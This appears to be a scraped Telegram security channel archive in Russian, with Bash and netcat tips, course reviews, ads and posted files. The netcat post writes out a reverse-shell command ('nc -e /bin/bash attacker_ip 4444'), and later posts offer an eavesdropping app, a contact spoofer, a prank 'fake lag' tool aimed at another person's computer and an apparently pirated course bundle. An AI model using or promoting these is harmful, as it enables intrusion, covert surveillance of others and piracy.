CodeGuard: Archive


Kanal geosi va tili: Rossiya, Ruscha


Полезные ресурсы
Автор: @Arakcheev_Ruslan
Все каналы: @invite_CodeGuard
Рекламный менеджер: @Diggsale
Купить рекламу: https://telega.in/c/+Zw_AVoZ_AHc3MDli

Bog‘liq kanallar

Kanal geosi va tili
Rossiya, Ruscha
Statistika
Postlar filtri


Bash_security_ops_handbook_2026_release_1_1_White2Hack_I_P_2026.pdf
409.1Kb
BASH БАЗА ДЛЯ КИБЕРБЕЗОПАНОСТИ, I.P. | White2Hack, 2026 (ver. 1.1), free editon

Новичкам в ИБ — если ты знаешь базовые команды, но не понимаешь, как применить их в безопасности. Книга показывает переход от «умею вводить команды» к «умею решать задачи».
Админам — если хочешь расширить Bash-навыки в сторону безопасности. Многие приёмы применимы и в обычной работе.
Студентам — как дополнение к курсам по Linux. Книга даёт практику, которой часто не хватает в теории.


😈 CodeGuard: Archive


ГЛАВНОЕ ПРАВИЛО РАБОТЫ С ИИ

«Хорошие художники копируют, великие — крадут». Фраза Джобса идеально описывает суть нейросетей.

ИИ полезен только потому, что вобрал в себя опыт миллионов людей. В нем нет «реального интеллекта»: модели играют в угадайку, предсказывая следующий шаг по массиву данных. Алгоритмы ничего не создают из вакуума — они целиком опираются на чужой фундамент.

Парадокс в том, что люди при этом пытаются всё делать с чистого листа. Открывают пустой чат и часами изобретают велосипед в попытках добиться нужного ответа от модели, хотя под большинство рутинных задач готовые решения уже выложены в сеть.

Результат появляется, когда перестаешь биться с пустым экраном, берешь отлаженные связки и адаптируешь под себя.


Собрал подборку каналов с практиками, которые делятся своими рабочими сценариями: от вайб-кодинга и скриптов до неочевидных промптов и качественного визуала.

Делюсь ссылкой — пригодится, чтобы подсматривать готовые наработки и закрывать задачи в разы быстрее:

👉 https://t.me/addlist/VXoj-kwsb7w5OWYy


netcat: одна утилита, которая умеет всё

Сегодня разбираем инструмент, который появился в 1995 году и до сих пор стоит в арсенале каждого админа и пентестера. Netcat — «швейцарский нож TCP/IP». Одна команда — и ты можешь слушать порты, передавать файлы, сканировать сети и даже получить shell.

Что это
nc (или netcat) — утилита для работы с TCP и UDP. Она читает и пишет данные через сетевые соединения. Не имеет встроенного шифрования, не умеет в HTTP — но именно поэтому универсальна.
5 вещей, которые я делаю через netcat
1. Проверить, открыт ли порт
bash
nc -zv 192.168.1.1 22
Результат: Connection to 192.168.1.1 22 port [tcp/ssh] succeeded! Если порт закрыт — Connection refused.
Это быстрее, чем nmap, когда нужно проверить один порт.

2. Передать файл между машинами
На приёмнике:
nc -l -p 4444 > received_file

На отправителе:
nc 192.168.1.2 4444 < file_to_send
Файл ушёл. Без SCP, без FTP, без настройки. Если машины в одной сети — работает за секунды.

3. Слушать трафик на порту
nc -l -p 8080
Теперь всё, что приходит на порт 8080, выводится в терминал. Удобно для отладки: клиент стучится — ты видишь запрос.

4. Простой чат между двумя машинами
На первой:
nc -l -p 4444

На второй:
nc 192.168.1.2 4444
Пишешь текст — он появляется у собеседника. Небезопасно, но для быстрой связи в локальной сети работает.

5. Получить shell (если сервер уязвим)
Это классика пентеста. Если на сервере есть RCE, атакующий может запустить:
nc -e /bin/bash attacker_ip 4444

Тогда на машине атакующего:
nc -lvnp 4444
И он получает shell. Именно поэтому nc часто называют «backdoor в одну строку». В легальном пентесте это демонстрирует опасность RCE.

😈 CodeGuard: Archive


🫥 Сервис запустили - пора принимать поздравления и платежи

С платежами поможет pay.hot. Подключаем оплату на сайте, в приложении или Telegram:

- СБП
- Банковские карты РФ
- Международные банковские карты

🫥 Можно подключиться без ИП и ООО в России, а выручку получать в USDT.

🫥 Работаем с пополнением Steam, донатами в игры, VPN-сервисами, Таро-ботами, магазинами цифровых товаров, хостингами и нейросервисами.

🫥 Согласование и подключение - обычно до 7 часов. Поддержка на связи 24/7.

🫥 Кстати, у нас есть агентская программа. Если знаете проекты, которым нужен приём платежей, можете помогать им подключаться к pay.hot и получать агентское вознаграждение.

🫥 Расскажите о своём проекте: @payhotsupport_bot


Я прошёл курс по Threat Intelligence за 6 часов. Вот что осталось в голове

Если ты думаешь, что threat intelligence — это для избранных из больших корпораций, этот курс тебя переубедит. Он бесплатный. И он объясняет, как думать, а не просто собирать IOC.

Что за курс
Introduction to Threat Intelligence — модуль в рамках бесплатной программы Introduction to Cyber Security от OpenLearn (The Open University). Он не про инструменты. Он про процесс: как превратить сырые данные в решение.
Курс короткий — около 6 часов. Но плотный. Никакой воды.


Что осталось в голове

🟣Первое: Intelligence ≠ Information
Данные — это факты. Информация — это данные с контекстом. Intelligence — это информация, на основе которой можно принять решение. Разница принципиальная. Можно собрать тысячу IOC и не иметь ни одного вывода.
🟣Второе: цикл разведки
Direction → Collection → Processing → Analysis → Dissemination. Пять шагов. Если пропустить первый (что именно мы хотим узнать?), всё остальное — трата времени. Курс учит начинать с вопроса, а не с инструмента.
🟣Третье: источники делятся на уровни
Стратегический (для руководства), операционный (для планирования), тактический (для SOC). Один и тот же инцидент выглядит по-разному на каждом уровне. Курс показывает, как не путать аудитории.
🟣Четвёртое: IOC устаревают
IP-адреса меняются за часы. Домены — за дни. Хеши — за недели. Курс объясняет, почему гоняться за IOC — плохая стратегия. Работать надо с TTP (тактиками, техниками, процедурами) — они живут дольше.
🟣Пятое: главное — не собрать, а объяснить
Самая сложная часть — не сбор данных. А формулировка вывода, которому поверят. Курс даёт шаблоны: как писать отчёт, чтобы его прочитали, а не отложили в сторону.


😈 CodeGuard: Archive


Такие шпоры нужны?
❤️ — да, приколдесно
👍 — нет, не приколдесно, время пол четвертого утра, админ иди спать...

😈 CodeGuard: Archive


🤔 Одна команда, которая найдёт топ-10 IP в логе

Задача: в access-логе найти, кто долбит сервер чаще всех. Открывать в редакторе — самоубийство.
cut -d' ' -f1 access.log | sort | uniq -c | sort -rn | head -10

Что происходит:
cut -d' ' -f1 — берёт первое поле (IP)
sort — сортирует (без него uniq не работает)
uniq -c — считает повторы
sort -rn — сортирует по числу
head -10 — топ-10

Результат:
8432 185.234.72.11
1204 91.201.43.7
872 45.155.204.19
8432 запроса с одного IP за день — это не человек. Это бот.

Запомни связку:
cut -d' ' -fN файл | sort | uniq -c | sort -rn | head
Меняешь номер поля — и считаешь что угодно: топ URL, топ User-Agent, топ кодов ответа.

😈 CodeGuard: Archive


🎓 КУРС, КОТОРЫЙ СТОИТ ПРОЙТИ: Introduction to Cybersecurity от Cisco Networking Academy
Суббота. Время для длинного материала. Этот курс я прошёл год назад — и до сих пор рекомендую его всем, кто хочет войти в ИБ, но не знает, с какой стороны подойти.

Почему именно он
Большинство вводных курсов по безопасности начинаются с определений: «что такое CIA Triad», «что такое угроза», «что такое уязвимость». Ты слушаешь 40 минут теории и не понимаешь, как это применить.

Cisco сделали иначе. Их курс — про ландшафт угроз и реальные сценарии. Ты не зубришь термины, а разбираешь кейсы: как фишинг выглядит в жизни, почему слабые пароли до сих пор работают, как атакующие используют социальную инженерию.
Курс бесплатный. Сертификат — тоже. Никаких скрытых платежей.

Что внутри
🟣Введение в кибербезопасность — что это, зачем нужно, какие роли существуют на рынке.
🟣Типы угроз — malware, фишинг, ransomware, социальная инженерия. С примерами и разбором.
🟣Защита данных — шифрование, аутентификация, контроль доступа. Без сложных формул.
🟣Безопасность сетей — как защищают периметр, что такое файрволы и VPN.
🟣Карьерные пути — какие есть позиции в ИБ, что нужно знать для каждой.

Курс рассчитан на 6 часов. Можно пройти за выходные.

Кому подойдёт
✨Новичкам — это лучшая точка входа. Ты получишь карту местности, а не набор разрозненных фактов.
✨Разработчикам — если ты пишешь код и хочешь понимать, как его атакуют.
✨Всем, кто хочет сменить профессию — курс даёт понимание, нужно ли тебе это вообще.

Что после него
Курс не делает тебя специалистом. Он даёт фундамент. Дальше можно идти в:
TryHackMe — практические лаборатории для закрепления.
PortSwigger Web Security Academy — если хочешь в веб-безопасность.
Linux Foundation LFS101 — если понимаешь, что без Linux в ИБ никуда.
Но первый шаг — вот этот курс.

Как проходить
Не просто смотри видео. После каждого модуля — пауза. Запиши три вещи, которые были новыми. Потом попробуй объяснить их кому-то вслух (или в заметках). Если не получается — вернись и перечитай.
Так материал закрепляется.

😈 CodeGuard: Archive


ISO 27001-2022 Controls HD.png
1.9Mb
📄 Шпаргалка по направлениям ISO

😈 CodeGuard: Archive


👋 Всем привет! Недавно закончил крупное обновление!
@CTF_CodeGuard_bot — он стал ещё мощнее 😈

Что добавил:
🤖 ИИ-ассистента Элиота — шарит в ИБ, объяснит непонятное и поможет с заданиями, но готовое решение вам не сольёт))

📚 Базу знаний и шпаргалки — Linux, сети, Web, OSINT, SQL. Всё под рукой, с поиском и закладками.

📰 Разборы реальных инцидентов — что взломали, почему и как от такого защититься.

🧭 Личный план развития — чтобы видеть свой прогресс и понимать, что изучать дальше.


💀 Залетайте, пробуйте и пишите, как вам обновление. Обратная связь поможет сделать бота ещё лучше.
Всех обнял ❤️

👉 https://t.me/CTF_CodeGuard_bot




DualSpacePro_200322143425.apk
17.4Mb
😎 Клонер без границ

😎 Лучшее nрuл0жение-кл0нер, позволяющий дублuровать любые npил0жения сколько угодно раз


XYplorer 21.50.0100.rar
5.0Mb
😎XYpl@rer — альтернатива проводнику

Мощный файловый менеджер для тех, кто перерос стандартный Windows Explorer. Простой и привычный интерфейс, но с расширенной функциональностью: вкладки, продвинутый поиск, удобная навигация, кастомизация под себя.

Отлично подойдёт для тех, кто работает с большим количеством файлов и хочет ускорить рутину.


Everything Setup.exe
1.9Mb
😎 Мгновенный поuck по файлам

😎 Данный позволяет мгновенно искать по имени файла. Работает намного быстрее, чем стандартный поuск Винды


Program400tb.zip
53.4Mb
😎 Обучение программирования

😎 978 курсов с Udemy по всем направлениям. Программирование, дизайн, блокчейн, нейросети и тд. От новичка до профи всё в одном файле. Общая стоимость курсов переваливает за 2 миллиона рублей.


SpyDetect.zip
3.5Mb
🐰Какие приложения получают доступ к камере?

Прога в реальном времени показывает, какие приложения используют камеру, микрофон и другие модули устройства.


Fake Contacts.apk
16.8Mb
😎 Контра геtконtаkт

😎 Данный осуществляет подмену контаkt0в в сnuсkе для увеличения безопасности


eagsec.apk
5.8Mb
😎Полная прослушка

😎Прослушка, возможность настроить эквалайзер для более сильной прослушки отключая посторонние шумы.


InstAddr.apk
4.7Mb
😎InstAddr

Который Поможет Вам Создать Неограниченное Количество Временных Электронных Почт В Один Клик.


FakeDefender-main.zip
88.9Mb
😎Фейк-лаги для компьютера вашего обидчика

Программа которая поможет сделать фейк лаги компьютера что аж ты не сможешь отличить

Картинка замирает, курсор не двигается, и всё выглядит так, будто ты поймал синий экран или железо приказало долго жить.

20 ta oxirgi post ko‘rsatilgan.